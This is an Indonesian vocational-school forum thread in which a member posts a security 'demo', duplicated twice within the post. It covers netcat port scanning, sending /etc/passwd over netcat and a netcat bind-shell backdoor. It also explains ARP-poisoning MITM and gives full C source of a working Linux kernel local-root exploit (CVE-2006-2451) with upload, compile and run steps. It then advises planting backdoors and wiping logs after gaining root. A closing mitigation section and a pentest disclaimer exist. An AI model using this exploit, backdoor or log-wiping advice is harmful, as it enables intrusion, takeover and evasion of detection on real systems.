Search
Latest topics
Top posters
agoenk (2099) | ||||
viyan_cs (1036) | ||||
b-joe (749) | ||||
ieyaz_Chuit (725) | ||||
Zell Aristocrats (667) | ||||
jun43d1 (638) | ||||
Hetro_fabio (314) | ||||
twinkblack (265) | ||||
suzee_tkj2 (237) | ||||
harmoko (184) |
Demo System & Network Security
3 posters
Demo System & Network Security
Tools yang dibahas antara lain:
A. Demo menggunakan netcat “TCP/IP swiss army knife”
- Utility jaringan serba-guna
- Ukuran sangat kecil, sering dibundle dengan aplikasi jaringan lainnya
- Menggunakan protocol transport TCP dan UDP
Sintaks command (lebih jelas man nc):
nc [option] [hostname atau ip] [portnumber]
Misal : nc -v <target-host> 80
viyan@cs:~$ nc -v www.te.ugm.ac.id 80
DNS fwd/rev mismatch: te.ugm.ac.id != server.te.abc.ac.id
te.abc.ac.id [222.124.24.18] 80 (www) open
GET / HTTP
HTTP/1.1 302 Found
Date: Thu, 09 Nov 2006 05:35:18 GMT
Server: Apache
X-Powered-By: PHP/4.4.0
Location: site/
Content-Length: 0
Connection: close
Content-Type: text/html
Netcat sebagai port scanner dan identifikasi versi server
viyan@cs:~$ nc -v -z -n 172.16.25.11 20-80
(UNKNOWN) [172.16.25.11] 80 (www) open
(UNKNOWN) [172.16.25.11] 22 (ssh) open
(UNKNOWN) [172.16.25.11] 21 (ftp) open
viyan@cs:~$ echo QUIT |nc -v -n -r 172.16.25.11 20-80
(UNKNOWN) [172.16.25.11] 80 (www) open
(UNKNOWN) [172.16.25.11] 21 (ftp) open
220---------- Welcome to Pure-FTPd ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 11:43. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
221-Goodbye. You uploaded 0 and downloaded 0 kbytes.
221 Logout.
(UNKNOWN) [172.16.25.11] 22 (ssh) open
SSH-2.0-OpenSSH_3.9p1
Protocol mismatch.
viyan@cs:~$
Netcat untuk data transfer
kompA# nc –l –p 12345 < /etc/passwd
kompB# nc <ipkompA> 12345
root0:0:root:/root:/bin/bash
daemon1:1:daemon:/usr/sbin:/bin/sh
bin2:2:bin:/bin:/bin/sh
sys3:3:sys:/dev:/bin/sh
sync4:65534:sync:/bin:/bin/sync
games5:60:games:/usr/games:/bin/sh
man6:12:man:/var/cache/man:/bin/sh
lp7:7:lp:/var/spool/lpd:/bin/sh
mail8:8:mail:/var/mail:/bin/sh
news9:9:news:/var/spool/news:/bin/sh
...
Netcat untuk remote shell daemon ( sering digunakan sebagai backdoor)
kompA # nc –l –p 12345 –e /bin/bash
kompB # nc 192.168.1.102 12345
uname -a
Linux kompA 2.6.15-23-386 #1 PREEMPT Tue May 23 13:49:40 UTC 2006
i686 GNU/Linux
dir
Document Data script
ls -al
total 76
drwxr-xr-x 11 root root 4096 2006-11-07 22:02 .
drwxr-xr-x 20 root root 4096 2006-09-05 11:19 ..
drwx------ 2 root root 4096 2006-06-20 08:10 .aptitude
-rw------- 1 root root 7310 2006-11-07 23:53 .bash_history
-rw-r--r-- 1 root root 2227 2005-10-13 18:04 .bashrc
drwx------ 3 root root 4096 2006-09-06 13:57 .gconf
...
B. Demo MITM dan Sniffing pada Switch Network menggunakan
ettercap dan tethereal
Skenario awal pada gambar :
Demo (1) Penjahat ingin mendapatkan data atau user/password si Korban
melalui aktifitas penyadapan komunikasi data antara Korban dan Server.
Demo (2) Penjahat ingin mendapatkan data atau user/password si Admin
melalui aktifitas penyadapan komunikasi data antara Admin dan Manageable
Switch
Teori untuk Demo (1):
1. Agar berhasil mendapatkan data atau user/password si Korban yang terdapat
di Server maka si Penjahat harus melakukan ARP Poisoning atau Spoofing.
Sebelumnya, kita harus memastikan ip forwarding telah di enable di mesin
Penjahat.
2. Dengan memanfaatkan cara kerja ARP, dimana pada jaringan dengan
menggunakan switch, si Korban ketika ingin berkomunikasi dengan Server
(misalnya akses email via POP3, login FTP dst) akan terlebih dahulu
melakukan ARP Request yang menanyakan MAC mesin Server (IP Server),
Pesan ARP Request ini dikirimkan ke alamat broadcast, yang hendaknya akan
dijawab (di Replay) oleh Mesin Server yang akan dituju.
3. Hal inilah yang akan dimanfaatkan oleh ettercap, dimana aplikasinya mampu
memodifikasi atau melakukan ARP Poisoning atau Spoofing
Dapat dilihat pada gambar berikut :
4. Setelah mesin Korban menerima ARP reply tersebut, maka si Korban akan
mulai melakukan komunikasi dengan mesin yang MAC addressnya diberikan
pada pesan “ARP Reply” yang sudah dimodifikasi tersebut. Komunikasi yang
terjadi sebagai berikut :
5. Setelah terbentuk MITM ( Man In The Middle ), si Penjahat dapat dengan
mudah melakukan penyadapan (sniffing) terhadap komunikasi data yang
terjadi antara mesin Korban dan Server, karena komunikasi yang terjadi
antara kedua Mesin tersebut akan selalu melalui Mesin Penjahat.
disini sya tidak menuliskan untuk langkah2 prakteknya tapi lebih menjurus kepemahaman..karna itulah saia tuliskan artikel ini..
Gunakan langkah dan skenario yang hampir sama dengan Demo (1) untuk
mempraktikkan Demo (2)
C. Sesi Kiddies : Menggunakan Local r00t Exploit Kernel Linux
dengan bugs Core Dump Handling untuk versi Kernel 2.6.x (>=
2.6.13 && < 2.6.17.4)
mengu
Beberapa distro yang menggunakan versi kernel diatas dapat di exploit
menggunakan program/script tersebut, seperti Default kernel bawaan CD Ubuntu Dapper,
Ubuntu Breezy, Mandriva 2005, dan beberapa distro linux lainnya.
Script Local r00t Exploit dapat diperoleh dari website atau mailing list security
yang sudah sangat banyak terdapat di internet. Ada beberapa jenis script exploit yang
memanfaatkan Bugs ini. Tetapi yang akan kita demo-kan cukup satu saja, yakni script
yang dibuat oleh 2 orang yakni dreyer <luna@aditel.org> dan RoMaNSoFt
<roman@rs-labs.com>.
menggunakan bahasa C++
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/
sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ;
chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished)
...\n");
system("/tmp/sh -i");
}
saia tuliskan langkah2 tuk exploitasinya..tujuannya tuk penetration testing..jadi hanya tuk penetration testing jangan tuk merugikan orang lain..smoga ja orang yang menggunakan cara ne tuk kejahatan "HIDUPNYA NGGA TENANG"
oke saia lanjutkan
Langkah-langkah demo Exploit r00t menggunakan program/script diatas :
1. Save script diatas menjadi dengan nama file exploit.c ( berekstensi *.c)
2. Upload ke server Linux target (calon korban) yang masih menggunakan versi
Kernel Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4), misalnya pada Distro Ubuntu
Dapper atau Breezy yang masih menggunakan kernel bawaan installasi. Untuk
mencheck versi kernel yang digunakan oleh system, ketikkan ”uname -a” atau
”uname -r”.
Misal :
Server:~$ uname -r
2.6.15-23-386
Artinya, kernel yang digunakan oleh system tersebut menggunakan versi 2.6.15-
23-386, dan masih dapat diexploit oleh script diatas.
3. Compile dengan command :
Server:~$ gcc -o exploit exploit.c
Jika muncul pesan ”-bash: gcc: command not found”, artinya compiler gcc
belum diinstall pada system server. Untuk mengatasinya, dapat di compile di
server lain (yang menggunakan system sejenis), kemudian upload hasil compile
tersebut ke system target. ( Karena hanya untuk demo, silakan di install
menggunakan account admin pada system, klo distronya ubuntu ketik $sudo
apt-get install gcc )
Jika tidak muncul pesan error, maka akan menghasilkan binary program
exploit dengan nama file exploit yang siap di jalankan (di execute)
4. Jalankan dengan command :
Server:~$ ./exploit
Tunggu beberapa saat (kira kira 1 menit), akan menghasilkan :
Server:~$ ./exploit
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh-3.1# id
uid=1000(ghea) gid=1000(ghea) euid=0(root)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugde
v),106(lpadmin),110(scanner),112(admin),1000(ghea)
sh-3.1# <<< Anda sudah menjadi SuperUser (r00t) sekarang.
Setelah mendapat akses superuser (root), berarti system telah kita ambil alih
secara penuh. Sekarang kita bisa explore data dan informasi yang ada, seperti
/etc/passwd, /etc/shadow atau dapat juga membuat backdoor ( dengan rootkit atau
netcat ), yang jelas jangan lupa menghapus jejak seperti file logging yang
mungkin disimpan pada system (biasanya ada di /var/log/*)
D. Solusi atau cara mengatasi aktivitas seperti diatas (Demo diatas)
Network Scanning spt nmap, netcat, superscan dst, dapat diatasi menggunakan
network IDS (Instrusion Detection System) seperti snort dan IPS (Instrusion
Preventing System). Cara kerjanya, setelah IDS mendeteksi adanya serangan atau
scanning terhadap server, maka akan ada trigger yang mengaktifkan untuk
firewall untuk memblok IP atau attacker tersebut (IPS).
Cara lain, memanfaatkan ACL spt dengan TCPwrapper atau iptables untuk
memfilter akses terhadap layanan (services) yang tersedia. Sehingga hanya dari
jaringan atau network tertentu saja layanan tersebut dapat diakses.
Untuk mencegah dan mendeteksi terjadinya ARP spoofing, dapat menggunakan
tools ARPwatch. Tools ini akan melakukan monitoring pada sebuah interface
yang dalam kondisi promiscuous, dan merekam MAC/IP address selama waktu
tertentu. Ketika terjadi anomali seperti adanya pergantian MAC atau IP address,
maka aplikasi ini akan mengirimkan pesan peringatan ke server syslog (System
Logging).
Untuk mengatasi atau terhindar dari aktivitas penyadapan atau sniffing, usahakan
menggunakan layanan dengan protokol yang aman (secure), seperti teknologi
enkripsi, SSL atau TLS misalnya https, pop3s, ssh, sftp dst.
Untuk mencegah local r00t exploit kernel diatas ada berbagai cara yang dapat
dilakukan, yang paling utama, melakukan upgrade kernel linux, jangan lupa untuk
selalu monitor mailing list dan website security spt bugtraq, securityfocus,
packetstormsecurity dst .
Khusus untuk mencegah script exploit diatas, cara mengatasi 'sementara' dapat
dilakukan dengan command berikut (dengan user superuser):
# sysctl -w kernel.core_pattern=/dev/null
atau
# echo “/dev/null” > /proc/sys/kernel/core_pattern
Supaya bersifat fix dapat dilakukan dengan :
# echo ”sysctl -w kernel.core_pattern=/dev/null” >> /etc/sysctl.conf
- NetCat
Ettercap
Ethereal / tethereal
Kiddies session ( menggunakan script r00t Exploit kernel Linux)
Cara mengatasinya
A. Demo menggunakan netcat “TCP/IP swiss army knife”
- Utility jaringan serba-guna
- Ukuran sangat kecil, sering dibundle dengan aplikasi jaringan lainnya
- Menggunakan protocol transport TCP dan UDP
Sintaks command (lebih jelas man nc):
nc [option] [hostname atau ip] [portnumber]
Misal : nc -v <target-host> 80
viyan@cs:~$ nc -v www.te.ugm.ac.id 80
DNS fwd/rev mismatch: te.ugm.ac.id != server.te.abc.ac.id
te.abc.ac.id [222.124.24.18] 80 (www) open
GET / HTTP
HTTP/1.1 302 Found
Date: Thu, 09 Nov 2006 05:35:18 GMT
Server: Apache
X-Powered-By: PHP/4.4.0
Location: site/
Content-Length: 0
Connection: close
Content-Type: text/html
Netcat sebagai port scanner dan identifikasi versi server
viyan@cs:~$ nc -v -z -n 172.16.25.11 20-80
(UNKNOWN) [172.16.25.11] 80 (www) open
(UNKNOWN) [172.16.25.11] 22 (ssh) open
(UNKNOWN) [172.16.25.11] 21 (ftp) open
viyan@cs:~$ echo QUIT |nc -v -n -r 172.16.25.11 20-80
(UNKNOWN) [172.16.25.11] 80 (www) open
(UNKNOWN) [172.16.25.11] 21 (ftp) open
220---------- Welcome to Pure-FTPd ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 11:43. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
221-Goodbye. You uploaded 0 and downloaded 0 kbytes.
221 Logout.
(UNKNOWN) [172.16.25.11] 22 (ssh) open
SSH-2.0-OpenSSH_3.9p1
Protocol mismatch.
viyan@cs:~$
Netcat untuk data transfer
kompA# nc –l –p 12345 < /etc/passwd
kompB# nc <ipkompA> 12345
root0:0:root:/root:/bin/bash
daemon1:1:daemon:/usr/sbin:/bin/sh
bin2:2:bin:/bin:/bin/sh
sys3:3:sys:/dev:/bin/sh
sync4:65534:sync:/bin:/bin/sync
games5:60:games:/usr/games:/bin/sh
man6:12:man:/var/cache/man:/bin/sh
lp7:7:lp:/var/spool/lpd:/bin/sh
mail8:8:mail:/var/mail:/bin/sh
news9:9:news:/var/spool/news:/bin/sh
...
Netcat untuk remote shell daemon ( sering digunakan sebagai backdoor)
kompA # nc –l –p 12345 –e /bin/bash
kompB # nc 192.168.1.102 12345
uname -a
Linux kompA 2.6.15-23-386 #1 PREEMPT Tue May 23 13:49:40 UTC 2006
i686 GNU/Linux
dir
Document Data script
ls -al
total 76
drwxr-xr-x 11 root root 4096 2006-11-07 22:02 .
drwxr-xr-x 20 root root 4096 2006-09-05 11:19 ..
drwx------ 2 root root 4096 2006-06-20 08:10 .aptitude
-rw------- 1 root root 7310 2006-11-07 23:53 .bash_history
-rw-r--r-- 1 root root 2227 2005-10-13 18:04 .bashrc
drwx------ 3 root root 4096 2006-09-06 13:57 .gconf
...
B. Demo MITM dan Sniffing pada Switch Network menggunakan
ettercap dan tethereal
Skenario awal pada gambar :
Demo (1) Penjahat ingin mendapatkan data atau user/password si Korban
melalui aktifitas penyadapan komunikasi data antara Korban dan Server.
Demo (2) Penjahat ingin mendapatkan data atau user/password si Admin
melalui aktifitas penyadapan komunikasi data antara Admin dan Manageable
Switch
Teori untuk Demo (1):
1. Agar berhasil mendapatkan data atau user/password si Korban yang terdapat
di Server maka si Penjahat harus melakukan ARP Poisoning atau Spoofing.
Sebelumnya, kita harus memastikan ip forwarding telah di enable di mesin
Penjahat.
2. Dengan memanfaatkan cara kerja ARP, dimana pada jaringan dengan
menggunakan switch, si Korban ketika ingin berkomunikasi dengan Server
(misalnya akses email via POP3, login FTP dst) akan terlebih dahulu
melakukan ARP Request yang menanyakan MAC mesin Server (IP Server),
Pesan ARP Request ini dikirimkan ke alamat broadcast, yang hendaknya akan
dijawab (di Replay) oleh Mesin Server yang akan dituju.
3. Hal inilah yang akan dimanfaatkan oleh ettercap, dimana aplikasinya mampu
memodifikasi atau melakukan ARP Poisoning atau Spoofing
Dapat dilihat pada gambar berikut :
4. Setelah mesin Korban menerima ARP reply tersebut, maka si Korban akan
mulai melakukan komunikasi dengan mesin yang MAC addressnya diberikan
pada pesan “ARP Reply” yang sudah dimodifikasi tersebut. Komunikasi yang
terjadi sebagai berikut :
5. Setelah terbentuk MITM ( Man In The Middle ), si Penjahat dapat dengan
mudah melakukan penyadapan (sniffing) terhadap komunikasi data yang
terjadi antara mesin Korban dan Server, karena komunikasi yang terjadi
antara kedua Mesin tersebut akan selalu melalui Mesin Penjahat.
disini sya tidak menuliskan untuk langkah2 prakteknya tapi lebih menjurus kepemahaman..karna itulah saia tuliskan artikel ini..
Gunakan langkah dan skenario yang hampir sama dengan Demo (1) untuk
mempraktikkan Demo (2)
C. Sesi Kiddies : Menggunakan Local r00t Exploit Kernel Linux
dengan bugs Core Dump Handling untuk versi Kernel 2.6.x (>=
2.6.13 && < 2.6.17.4)
mengu
Beberapa distro yang menggunakan versi kernel diatas dapat di exploit
menggunakan program/script tersebut, seperti Default kernel bawaan CD Ubuntu Dapper,
Ubuntu Breezy, Mandriva 2005, dan beberapa distro linux lainnya.
Script Local r00t Exploit dapat diperoleh dari website atau mailing list security
yang sudah sangat banyak terdapat di internet. Ada beberapa jenis script exploit yang
memanfaatkan Bugs ini. Tetapi yang akan kita demo-kan cukup satu saja, yakni script
yang dibuat oleh 2 orang yakni dreyer <luna@aditel.org> dan RoMaNSoFt
<roman@rs-labs.com>.
menggunakan bahasa C++
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/
sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ;
chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished)
...\n");
system("/tmp/sh -i");
}
saia tuliskan langkah2 tuk exploitasinya..tujuannya tuk penetration testing..jadi hanya tuk penetration testing jangan tuk merugikan orang lain..smoga ja orang yang menggunakan cara ne tuk kejahatan "HIDUPNYA NGGA TENANG"
oke saia lanjutkan
Langkah-langkah demo Exploit r00t menggunakan program/script diatas :
1. Save script diatas menjadi dengan nama file exploit.c ( berekstensi *.c)
2. Upload ke server Linux target (calon korban) yang masih menggunakan versi
Kernel Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4), misalnya pada Distro Ubuntu
Dapper atau Breezy yang masih menggunakan kernel bawaan installasi. Untuk
mencheck versi kernel yang digunakan oleh system, ketikkan ”uname -a” atau
”uname -r”.
Misal :
Server:~$ uname -r
2.6.15-23-386
Artinya, kernel yang digunakan oleh system tersebut menggunakan versi 2.6.15-
23-386, dan masih dapat diexploit oleh script diatas.
3. Compile dengan command :
Server:~$ gcc -o exploit exploit.c
Jika muncul pesan ”-bash: gcc: command not found”, artinya compiler gcc
belum diinstall pada system server. Untuk mengatasinya, dapat di compile di
server lain (yang menggunakan system sejenis), kemudian upload hasil compile
tersebut ke system target. ( Karena hanya untuk demo, silakan di install
menggunakan account admin pada system, klo distronya ubuntu ketik $sudo
apt-get install gcc )
Jika tidak muncul pesan error, maka akan menghasilkan binary program
exploit dengan nama file exploit yang siap di jalankan (di execute)
4. Jalankan dengan command :
Server:~$ ./exploit
Tunggu beberapa saat (kira kira 1 menit), akan menghasilkan :
Server:~$ ./exploit
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh-3.1# id
uid=1000(ghea) gid=1000(ghea) euid=0(root)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugde
v),106(lpadmin),110(scanner),112(admin),1000(ghea)
sh-3.1# <<< Anda sudah menjadi SuperUser (r00t) sekarang.
Setelah mendapat akses superuser (root), berarti system telah kita ambil alih
secara penuh. Sekarang kita bisa explore data dan informasi yang ada, seperti
/etc/passwd, /etc/shadow atau dapat juga membuat backdoor ( dengan rootkit atau
netcat ), yang jelas jangan lupa menghapus jejak seperti file logging yang
mungkin disimpan pada system (biasanya ada di /var/log/*)
D. Solusi atau cara mengatasi aktivitas seperti diatas (Demo diatas)
Network Scanning spt nmap, netcat, superscan dst, dapat diatasi menggunakan
network IDS (Instrusion Detection System) seperti snort dan IPS (Instrusion
Preventing System). Cara kerjanya, setelah IDS mendeteksi adanya serangan atau
scanning terhadap server, maka akan ada trigger yang mengaktifkan untuk
firewall untuk memblok IP atau attacker tersebut (IPS).
Cara lain, memanfaatkan ACL spt dengan TCPwrapper atau iptables untuk
memfilter akses terhadap layanan (services) yang tersedia. Sehingga hanya dari
jaringan atau network tertentu saja layanan tersebut dapat diakses.
Untuk mencegah dan mendeteksi terjadinya ARP spoofing, dapat menggunakan
tools ARPwatch. Tools ini akan melakukan monitoring pada sebuah interface
yang dalam kondisi promiscuous, dan merekam MAC/IP address selama waktu
tertentu. Ketika terjadi anomali seperti adanya pergantian MAC atau IP address,
maka aplikasi ini akan mengirimkan pesan peringatan ke server syslog (System
Logging).
Untuk mengatasi atau terhindar dari aktivitas penyadapan atau sniffing, usahakan
menggunakan layanan dengan protokol yang aman (secure), seperti teknologi
enkripsi, SSL atau TLS misalnya https, pop3s, ssh, sftp dst.
Untuk mencegah local r00t exploit kernel diatas ada berbagai cara yang dapat
dilakukan, yang paling utama, melakukan upgrade kernel linux, jangan lupa untuk
selalu monitor mailing list dan website security spt bugtraq, securityfocus,
packetstormsecurity dst .
Khusus untuk mencegah script exploit diatas, cara mengatasi 'sementara' dapat
dilakukan dengan command berikut (dengan user superuser):
# sysctl -w kernel.core_pattern=/dev/null
atau
# echo “/dev/null” > /proc/sys/kernel/core_pattern
Supaya bersifat fix dapat dilakukan dengan :
# echo ”sysctl -w kernel.core_pattern=/dev/null” >> /etc/sysctl.conf
viyan_cs- tkj geek
- Posts : 1036
Join date : 2009-03-19
Age : 32
Location : bogkids
Re: Demo System & Network Security
sebelumnya mohon maaf pada admiin sekiranya yang saia postingkan berbahaya bisa di block....terima kasih
viyan_cs- tkj geek
- Posts : 1036
Join date : 2009-03-19
Age : 32
Location : bogkids
Re: Demo System & Network Security
@viyan_cs......: klo bisa postingan hrus di kasih sumber kalo memang dapet dari internet, ben ora di katakan tukang jiplak.......
alias plagiator......
thx
alias plagiator......
thx
johnbinus- tkjmaniac
- Posts : 129
Join date : 2009-11-01
Re: Demo System & Network Security
makasih tas sarannya om binus..yang pasti jangan lihat dari jiplak or tidaknya...lihatlah kegunaannya,kebetulan saya dapet materi itu dari seseorang guru saya.jadi disini saya cuma mengshare saja ...toh sebetulnya ga boleh disebarin ,takut da hal2 yang ngga diinginkan,tapi menurut saya klo kita dapet limu baru ngga disebarin ntar generasi kita gimana..dapat apanya donk ombinus...?ntar indonesia ngga maju2 ,sekali lagi saya ingin menjadikan forum ni bermanfaat dengan ilmunya..bukan karna tuk ketenaran pangkat or keahlian..johnbinus wrote:@viyan_cs......: klo bisa postingan hrus di kasih sumber kalo memang dapet dari internet, ben ora di katakan tukang jiplak.......
alias plagiator......
thx
terima kasih mudah2an om binus dapat memahami..
viyan_cs- tkj geek
- Posts : 1036
Join date : 2009-03-19
Age : 32
Location : bogkids
Re: Demo System & Network Security
tenang ja mas VIYAN posting ente disini Q dukung...
yg pnting tergantung org na msing2 mo bwt kejahatan apa ga??
jgn bosen2 post yg berhubungan sm scurity and network bgini...
post yg ky gni baru bermutu... mnambah ilmu dan wawasan...
dr pd yg cuma comentar tp ga mao post ilmu na disini...
wlw kita ga transparan dlm berbagi tp pling tdk qt sdh memberi tahu...
dgn bgtu pun udh bs disebut berbagi kn????
yg pnting tergantung org na msing2 mo bwt kejahatan apa ga??
jgn bosen2 post yg berhubungan sm scurity and network bgini...
post yg ky gni baru bermutu... mnambah ilmu dan wawasan...
dr pd yg cuma comentar tp ga mao post ilmu na disini...
wlw kita ga transparan dlm berbagi tp pling tdk qt sdh memberi tahu...
dgn bgtu pun udh bs disebut berbagi kn????
johan_ady24- tkjmaniac
- Posts : 114
Join date : 2009-03-25
Age : 31
Location : Lebaksiu - Slawie
Re: Demo System & Network Security
terima kasih tas dukungannya mas hady....johan_ady24 wrote:tenang ja mas VIYAN posting ente disini Q dukung...
yg pnting tergantung org na msing2 mo bwt kejahatan apa ga??
jgn bosen2 post yg berhubungan sm scurity and network bgini...
post yg ky gni baru bermutu... mnambah ilmu dan wawasan...
dr pd yg cuma comentar tp ga mao post ilmu na disini...
wlw kita ga transparan dlm berbagi tp pling tdk qt sdh memberi tahu...
dgn bgtu pun udh bs disebut berbagi kn????
viyan_cs- tkj geek
- Posts : 1036
Join date : 2009-03-19
Age : 32
Location : bogkids
Similar topics
» Mencoba Network Attached Storage (NAS) dengan FreeNAS
» AVG Internet Security 9.0 Full Version
» Test Antivirus Terbaik 2009 versi PC Security Labs
» Lisensi Gratis 1 Tahun BitDefender Internet Security 2009
» AVG Internet Security 9.0 Full Version
» Test Antivirus Terbaik 2009 versi PC Security Labs
» Lisensi Gratis 1 Tahun BitDefender Internet Security 2009
Permissions in this forum:
You cannot reply to topics in this forum
|
|
Tue Feb 14, 2017 11:22 am by agoenk
» Verifikasi UPK 2017
Tue Feb 14, 2017 11:01 am by agoenk
» Simulasi UBK tahap kedua
Tue Feb 14, 2017 10:44 am by agoenk
» Mengganti favicon di wordpress
Sat Feb 11, 2017 11:22 am by agoenk
» Undangan Pertemuan Rutin MGMP TKJ Gugus Bisman SMKN 1 Slawi bulan Desember 2016 sekaligus Pelatihan Mikrotik
Sat Nov 26, 2016 9:59 am by agoenk
» SPMI ( Sistem Penjaminan Mutu Internal ) untuk sekolah Model
Wed Oct 26, 2016 1:58 pm by agoenk
» Pertemuan Rutin MGMP TKJ Gugus Bisman SMK Negeri 1 Slawi Bulan Oktober 2016
Fri Oct 14, 2016 10:17 pm by agoenk
» INFO PPDB SMKN 1 SLAWI TAHUN PELAJARAN 2016 / 2017
Mon Jun 13, 2016 6:35 am by Admin
» Kegiatan 3P Jurusan TKJ SMKN 1 Slawi
Tue Apr 26, 2016 10:16 am by agoenk